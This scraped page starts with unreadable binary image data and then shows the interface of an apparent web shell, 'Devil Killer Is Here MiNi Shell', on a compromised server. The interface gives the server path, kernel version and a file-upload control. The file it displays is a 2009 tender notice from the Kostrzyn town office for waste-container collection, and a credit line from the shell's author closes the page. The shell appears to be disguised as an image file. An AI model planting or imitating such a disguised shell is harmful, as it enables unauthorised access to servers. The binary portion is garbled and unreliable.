JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090119/20759-N-2009.html

<p class="kh_header"><b>Kostrzyn: WYWÓZ ŚMIECI Z KONTENERA O POJEMNOŚCI 7,5 m3</b><br>
<b>Numer ogłoszenia: 20759 - 2009; data zamieszczenia: 19.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kostrzyn Urząd Miejski w Kostrzynie , ul. Dworcowa 5, 62-025 Kostrzyn, woj. wielkopolskie, tel. 061 8178565, faks 061 8178191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kostrzyn.wlkp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ ŚMIECI Z KONTENERA O POJEMNOŚCI 7,5 m3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  wywóz śmieci z   kontenera o poj. 7,5 m3 zlokalizowanego na parkingu Urzędu Miejskiego w Kostrzynie, przy ul. Dworcowej 5. 
1.	Do zadań wykonawcy należy wywóz śmieci z jednego kontenera o pojemności 7,5 m3, z posesji znajdującej się w Kostrzynie, ul. Dworcowa 5 - średnio 2 razy w tygodniu.
2.	Reakcja  na telefoniczne zgłoszenie o konieczności  wywozu śmieci z w/w  kontenera nie może przekroczyć 24 godzin z wyłączeniem dni wolnych od pracy. Samowolne wywiezienie kontenera -  bez wcześniejszego zgłoszenia pracownika Urzędu Miejskiego w Kostrzynie nie będzie podlegało zapłacie. 
3.	Usługę należy realizować specjalistycznym  środkiem transportowym służącym do wywozu śmieci i będącym w dyspozycji wykonawcy.
4.	Wykonawca zobowiązany jest   do zachowania  należytej staranności przy opróżnianiu kontenera.
5.	W przypadku uszkodzenia kontenera  przez Wykonawcę, Zamawiający zastrzega sobie prawo dochodzenia odszkodowania.
6.	Wykonawca zobowiązuje się do bezzwłocznego informowania Zamawiającego o uszkodzonym kontenerze  lub innych nieprawidłowościach występujących w trakcie realizacji zamówienia (wskazana forma pisemna).
7.	Wykonawca zobowiązuje się w razie potrzeby na życzenie Zleceniodawcy wstawić we wskazane miejsce dodatkowy kontener o poj. 7,5 m3 . 
8.	Wykonawca zobowiązany jest przedstawić Zamawiającemu w formie pisemnej roczne sprawozdanie o ilości (Mg, kg) wywiezionych z przedmiotowego kontenera, w terminie do 30 dni po zakończeniu roku kalendarzowego, którego sprawozdanie będzie dotyczyć.
9.	Wykonawca musi posiadać karty przekazania odpadów z w/w kontenera na składowisko
10.	W trakcie obowiązywania umowy ceny jednostkowe za wykonanie usług nie będą ulegały zmianom.
11.	W trakcie realizacji zamówienia ilość,  zakres zamówienia oraz częstość wywozu  mogą być modyfikowane w zależności od potrzeb Zamawiającego. Zamawiający zastrzega sobie prawo do zmniejszenia  zakresu usług, przyjmując do rozliczeń ceny jednostkowe za każdy opróżniony kontener.
12.	Wynagrodzenie płatne będzie wyłącznie za wykonaną usługę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki ogólne udziału w postępowaniu
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania działalności lub czynności, związanych z realizacją 	przedmiotu zamówienia,
2)	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami
zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Warunki szczegółowe wymagane od wykonawców :
1)	Wykonawca musi posiadać ważne zezwolenie na usuwanie odpadów komunalnych stałych na terenie miasta i gminy Kostrzyn. 
2)	 Wykonawca musi posiadać aktualne decyzje na transport odpadów.
3)	Osoby wyznaczone przez Wykonawcę do realizacji zamówienia muszą posiadać uprawnienia - prawo jazdy odpowiedniej kategorii.
4)	Wykonawca musi dysponować odpowiednimi pojazdami oraz niezbędnym sprzętem (wraz z obsługą) do realizacji niniejszego przedmiotu zamówienia - pojazd specjalistyczny do wywozu śmieci wyposażony w urządzenia umożliwiające załadunek kontenerów o pojemności 7,50 m3  .
5)	Wykonawca w okresie ostatnich trzech latach przed dniem wszczęcia  postępowania o udzielenie zamówienia (tj. 19.01.2009 r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością co najmniej jedno zamówienie o charakterze i złożoności porównywalnej z zakresem zamówienia, na które Wykonawca składa ofertę i o którym mowa w punkcie III niniejszej SIWZ  (doświadczenie podwykonawcy nie będzie brane pod uwagę) i dysponuje odpowiednimi referencjami lub innymi  dokumentami potwierdzającymi to. 
6)	Wykonawca musi posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnie z przedmiotem zamówienia.
7)	Informacja w zakresie wykonywania zamówienia przez podwykonawców - zamawiający nie przewiduje możliwości wykonywania usług przez podwykonawców, z wyjątkiem sytuacji losowych, wówczas całkowitą odpowiedzialność za realizację zamówienia ponosić będzie Wykonawca.

3.     Ocena spełnienia warunków w postępowaniu o zamówienie publiczne 
Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów na zasadzie: spełnia - nie spełnia.

3.1.  Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
1)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o
których mowa w art. 22. ust.  pkt. 1-3, art. 24 ust. 1 Prawa zamówień publicznych,
2)	wykonawców,     którzy   bezpośrednio  wykonywali    czynności    związane    z    przygotowaniem     prowadzonego postępowania,   lub   posługiwali   się   w   celu   sporządzenia   oferty   osobami   uczestniczącymi   w dokonywaniu tych czynności, chyba, że udział  tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji,
3)	wykonawców,   którzy   złożyli   nieprawdziwe   informacje   mające   wpływ   na   wynik   prowadzonego
postępowania,
4)	wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub
dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy , z zastrzeżeniem art. 26 ust. 3,
5)	wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.

Zamawiający odrzuca ofertę, jeżeli:

1)	jest  niezgodna   z   ustawą ,
2)	jej  treść   nie   odpowiada   treści   specyfikacji   istotnych   warunków  zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3;
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej
konkurencji,
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera błędy w obliczeniu ceny,
7)	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3,
8)	jest nieważna na podstawie odrębnych przepisów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
1)	aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
ofert, (tj. wystawiony po dniu 26.07.2008 r.),
2)	dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
3)	oświadczenie do postępowania o zamówienia publiczne z art. 22 ust. 1 ustawy Prawo zamówień Publicznych z wykorzystaniem wzoru oraz oświadczenie dotyczące właściwości Wykonawcy - zawarte w załączniku nr 1 do SIWZ.
4)	Wypełniony i podpisany formularz ofertowy - zał. nr 1 do SIWZ
5)	Wypełniony zał. nr 4 do SIWZ  KOSZTORYS OFERTOWY,

2.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast  aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiedni, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dodatkowe dokumenty wymagane w przypadku składania oferty wspólnej
1)	umowa regulująca współpracę podmiotów występujących wspólnie lub zobowiązanie do jej zawarcia w 
	przypadku wyboru ich oferty.
2)	Oferta winna zawierać wymienione wcześniej wymagane dokumenty dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie .

4.    Inne dokumenty:

1.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia -- wystarczy oświadczenie Wykonawcy, złożone w formularzu ofertowym (zał. 1 do SIWZ),
2.	 W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia -- wystarczy oświadczenie Wykonawcy, złożone w formularzu ofertowym (zał. 1 do SIWZ)
Wszystkie dokumenty (z wyjątkiem oryginałów pełnomocnictw i upoważnień do podpisania oferty) mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność (każdą zapisaną stronę dokumentu) przez osobę lub osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem i z datą dokonania potwierdzenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl (bip, przetargi, SIWZ, 2009).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZAD MIEJSKI  w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5, pok. 31 -II p..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2009 godzina 09:00, miejsce: URZAD MIEJSKI  w Kostrzynie, 62-025 KOSTRZYN, ul. Dworcowa 5, pok. 01 - sekretariat - I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 25.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com